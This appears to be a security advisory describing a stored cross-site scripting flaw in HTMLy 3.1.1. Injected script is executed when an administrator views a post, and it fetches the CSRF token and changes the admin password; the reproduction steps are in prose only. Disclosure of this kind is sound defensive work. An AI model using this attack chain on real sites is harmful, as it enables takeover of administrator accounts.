HTMLy Cross-Site Scripting Vulnerability Leading to Admin Account Takeover

A stored Cross-Site Scripting (XSS) vulnerability has been identified in HTMLy version 3.1.1. The issue arises in the content creation feature at the '/add/content?type=image' endpoint, where the application fails to adequately sanitize user input. This allows authenticated low-privileged users to inject malicious JavaScript into the content field, which is then executed when an administrator views the post. The vulnerability can be exploited to retrieve the CSRF token from the administrator's password change page and use it to modify admin credentials, resulting in a complete takeover of the admin account.

Impact

Exploitation of this vulnerability allows for the execution of JavaScript in the context of an administrator's browser session. This bypasses CSRF protections by dynamically retrieving valid tokens, leading to unauthorized changes in admin credentials and a full compromise of the application.

Reproduction

To reproduce this vulnerability, log in to HTMLy with a low-privileged user account and navigate to the '/add/content?type=image' endpoint. Insert a payload into the content field that includes a script to fetch the CSRF token from the admin password change page. Once the content is published, log in as an administrator, go to the '/admin/posts' section, and open the malicious post. The injected script will execute, retrieve the CSRF token, and send a request to change the admin password, allowing for account takeover.